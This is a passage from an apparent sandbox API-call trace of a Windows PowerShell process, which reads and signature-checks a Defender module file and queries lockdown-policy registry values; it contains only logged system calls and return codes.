lpBuffer=0x2c2a760*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0338.891] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x2000 [0338.891] ReadFile (in: hFile=0x7cc, lpBuffer=0x2c2a760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2c2a760*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0338.891] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3000 [0338.891] ReadFile (in: hFile=0x7cc, lpBuffer=0x2c2a760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2c2a760*, lpNumberOfBytesRead=0x1b62cd58*=0xb60, lpOverlapped=0x0) returned 1 [0338.891] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3b60 [0338.891] ReadFile (in: hFile=0x7cc, lpBuffer=0x2c29e10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2c29e10*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0338.891] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3b60 [0338.892] ReadFile (in: hFile=0x7cc, lpBuffer=0x2c2a760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2c2a760*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0338.892] CoTaskMemAlloc (cb=0x20c) returned 0x1b648930 [0338.892] GetSystemDirectoryW (in: lpBuffer=0x1b648930, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0338.893] CoTaskMemFree (pv=0x1b648930) [0338.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0338.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0338.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca18) returned 1 [0338.893] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd40 | out: lpFileInformation=0x1b62cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0338.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9c8) returned 1 [0338.893] GetSystemInfo (in: lpSystemInfo=0x1b62cdc0 | out: lpSystemInfo=0x1b62cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0338.894] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62ccc8 | out: phkResult=0x1b62ccc8*=0x7d0) returned 0x0 [0338.894] RegQueryValueExW (in: hKey=0x7d0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62cd18, lpData=0x0, lpcbData=0x1b62cd10*=0x0 | out: lpType=0x1b62cd18*=0x0, lpData=0x0, lpcbData=0x1b62cd10*=0x0) returned 0x2 [0338.894] RegCloseKey (hKey=0x7d0) returned 0x0 [0338.894] CloseHandle (hObject=0x7cc) returned 1 [0339.040] CoCreateGuid (in: pguid=0x1b62ce58 | out: pguid=0x1b62ce58*(Data1=0xea2ed33c, Data2=0x2c21, Data3=0x4a7d, Data4=([0]=0x8b, [1]=0xf9, [2]=0x1, [3]=0xff, [4]=0x55, [5]=0xb4, [6]=0x8d, [7]=0x19))) returned 0x0 [0339.045] AmsiScanBuffer () returned 0x80070015 [0339.051] EtwEventWriteTransfer () returned 0x0 [0339.087] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.088] EtwEventActivityIdControl () returned 0x0 [0339.088] EtwEventActivityIdControl () returned 0x0 [0339.088] EtwEventActivityIdControl () returned 0x0 [0339.088] EtwEventActivityIdControl () returned 0x0 [0339.088] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.089] EtwEventActivityIdControl () returned 0x0 [0339.089] EtwEventActivityIdControl () returned 0x0 [0339.089] EtwEventActivityIdControl () returned 0x0 [0339.090] EtwEventActivityIdControl () returned 0x0 [0339.090] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0xd4489f78, Data2=0x5ce7, Data3=0x4f58, Data4=([0]=0xb6, [1]=0x1d, [2]=0xd0, [3]=0xe4, [4]=0x4, [5]=0x90, [6]=0x2f, [7]=0xe6))) returned 0x0 [0339.091] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0xf648078, Data2=0xedc7, Data3=0x4c6a, Data4=([0]=0x9f, [1]=0x44, [2]=0x36, [3]=0xa3, [4]=0x9a, [5]=0x7, [6]=0x76, [7]=0xd9))) returned 0x0 [0339.091] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.092] EtwEventActivityIdControl () returned 0x0 [0339.092] EtwEventActivityIdControl () returned 0x0 [0339.092] EtwEventActivityIdControl () returned 0x0 [0339.093] EtwEventActivityIdControl () returned 0x0 [0339.093] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0xabfb0da7, Data2=0xbe14, Data3=0x42f8, Data4=([0]=0xb8, [1]=0xa6, [2]=0xa9, [3]=0x6e, [4]=0xe6, [5]=0xf1, [6]=0x3a, [7]=0x0))) returned 0x0 [0339.093] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.094] EtwEventActivityIdControl () returned 0x0 [0339.094] EtwEventActivityIdControl () returned 0x0 [0339.094] EtwEventActivityIdControl () returned 0x0 [0339.095] EtwEventActivityIdControl () returned 0x0 [0339.095] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml")) returned 0x20 [0339.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0339.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0339.096] CoTaskMemAlloc (cb=0x20c) returned 0x1b648d70 [0339.096] GetSystemDirectoryW (in: lpBuffer=0x1b648d70, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0339.096] CoTaskMemFree (pv=0x1b648d70) [0339.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0339.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0339.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9f8) returned 1 [0339.097] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd20 | out: lpFileInformation=0x1b62cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0339.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9a8) returned 1 [0339.097] GetSystemInfo (in: lpSystemInfo=0x1b62cda0 | out: lpSystemInfo=0x1b62cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0339.098] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62cca8 | out: phkResult=0x1b62cca8*=0x7cc) returned 0x0 [0339.098] RegQueryValueExW (in: hKey=0x7cc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62ccf8, lpData=0x0, lpcbData=0x1b62ccf0*=0x0 | out: lpType=0x1b62ccf8*=0x0, lpData=0x0, lpcbData=0x1b62ccf0*=0x0) returned 0x2 [0339.098] RegCloseKey (hKey=0x7cc) returned 0x0 [0339.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0339.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0339.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca48) returned 1 [0339.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x25593f0 | out: lpFileInformation=0x25593f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2cbbd328, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x396e)) returned 1 [0339.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0339.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0339.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0339.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9c8) returned 1 [0339.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62ccf0 | out: lpFileInformation=0x1b62ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2cbbd328, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x396e)) returned 1 [0339.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c978) returned 1 [0339.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0339.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0339.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0339.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0339.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c888) returned 1 [0339.100] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62cbb0 | out: lpFileInformation=0x1b62cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2cbbd328, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x396e)) returned 1 [0339.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c838) returned 1 [0339.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0339.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0339.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca88) returned 1 [0339.101] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7cc [0339.101] GetFileType (hFile=0x7cc) returned 0x1 [0339.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0339.101] GetFileType (hFile=0x7cc) returned 0x1 [0339.101] WTGetSignatureInfo () returned 0x0 [0339.160] CertDuplicateCertificateContext (pCertContext=0x1b662a70) returned 0x1b662a70 [0339.160] CryptCATHandleFromStore () returned 0x6f89d0 [0339.160] WTHelperGetProvSignerFromChain () returned 0x6f8900 [0339.160] WTHelperGetProvCertFromChain () returned 0x6fbbb0 [0339.161] CertDuplicateCertificateContext (pCertContext=0x1b6621f0) returned 0x1b6621f0 [0339.162] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62caf8 | out: phkResult=0x1b62caf8*=0x7d4) returned 0x0 [0339.162] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x0, lpcbData=0x1b62cb40*=0x0 | out: lpType=0x1b62cb48*=0x1, lpData=0x0, lpcbData=0x1b62cb40*=0x56) returned 0x0 [0339.162] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x2559c70, lpcbData=0x1b62cb40*=0x56 | out: lpType=0x1b62cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b62cb40*=0x56) returned 0x0 [0339.162] RegCloseKey (hKey=0x7d4) returned 0x0 [0339.162] CoTaskMemAlloc (cb=0x10) returned 0x1a8a7c90 [0339.162] CoTaskMemAlloc (cb=0x50) returned 0x1a89a560 [0339.162] WinVerifyTrust () returned 0x0 [0339.163] CoTaskMemFree (pv=0x1a89a560) [0339.163] CoTaskMemFree (pv=0x1a8a7c90) [0339.163] CertFreeCertificateContext (pCertContext=0x1b662a70) returned 1 [0339.163] CloseHandle (hObject=0x7cc) returned 1 [0339.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0339.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0339.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62cd48) returned 1 [0339.164] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7cc [0339.164] GetFileType (hFile=0x7cc) returned 0x1 [0339.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62ccb8) returned 1 [0339.164] GetFileType (hFile=0x7cc) returned 0x1 [0339.165] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x0 [0339.165] ReadFile (in: hFile=0x7cc, lpBuffer=0x255adb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x255adb8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.165] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x1000 [0339.165] ReadFile (in: hFile=0x7cc, lpBuffer=0x255adb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x255adb8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.166] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x2000 [0339.166] ReadFile (in: hFile=0x7cc, lpBuffer=0x255adb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x255adb8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.166] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3000 [0339.166] ReadFile (in: hFile=0x7cc, lpBuffer=0x255adb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x255adb8*, lpNumberOfBytesRead=0x1b62cd58*=0x96e, lpOverlapped=0x0) returned 1 [0339.166] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x396e [0339.167] ReadFile (in: hFile=0x7cc, lpBuffer=0x255a276, nNumberOfBytesToRead=0x292, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x255a276*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0339.167] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x396e [0339.167] ReadFile (in: hFile=0x7cc, lpBuffer=0x255adb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x255adb8*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0339.167] CoTaskMemAlloc (cb=0x20c) returned 0x1b64a2b0 [0339.167] GetSystemDirectoryW (in: lpBuffer=0x1b64a2b0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0339.168] CoTaskMemFree (pv=0x1b64a2b0) [0339.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0339.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0339.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca18) returned 1 [0339.169] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd40 | out: lpFileInformation=0x1b62cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0339.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9c8) returned 1 [0339.169] GetSystemInfo (in: lpSystemInfo=0x1b62cdc0 | out: lpSystemInfo=0x1b62cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0339.169] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62ccc8 | out: phkResult=0x1b62ccc8*=0x7d0) returned 0x0 [0339.170] RegQueryValueExW (in: hKey=0x7d0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62cd18, lpData=0x0, lpcbData=0x1b62cd10*=0x0 | out: lpType=0x1b62cd18*=0x0, lpData=0x0, lpcbData=0x1b62cd10*=0x0) returned 0x2 [0339.170] RegCloseKey (hKey=0x7d0) returned 0x0 [0339.170] CloseHandle (hObject=0x7cc) returned 1 [0339.195] CoCreateGuid (in: pguid=0x1b62ce58 | out: pguid=0x1b62ce58*(Data1=0x4cf8c5ad, Data2=0x9c3b, Data3=0x4944, Data4=([0]=0x89, [1]=0x40, [2]=0x64, [3]=0xf2, [4]=0x77, [5]=0x13, [6]=0xa6, [7]=0xfd))) returned 0x0 [0339.202] AmsiScanBuffer () returned 0x80070015 [0339.209] EtwEventWriteTransfer () returned 0x0 [0339.209] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.210] EtwEventActivityIdControl () returned 0x0 [0339.210] EtwEventActivityIdControl () returned 0x0 [0339.210] EtwEventActivityIdControl () returned 0x0 [0339.210] EtwEventActivityIdControl () returned 0x0 [0339.211] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.211] EtwEventActivityIdControl () returned 0x0 [0339.211] EtwEventActivityIdControl () returned 0x0 [0339.211] EtwEventActivityIdControl () returned 0x0 [0339.212] EtwEventActivityIdControl () returned 0x0 [0339.212] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0x419ad66d, Data2=0xfb59, Data3=0x4166, Data4=([0]=0x89, [1]=0x4f, [2]=0x95, [3]=0xe, [4]=0x85, [5]=0x6a, [6]=0xa0, [7]=0x9a))) returned 0x0 [0339.212] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0xe6bb80f8, Data2=0x92dd, Data3=0x4e61, Data4=([0]=0xb1, 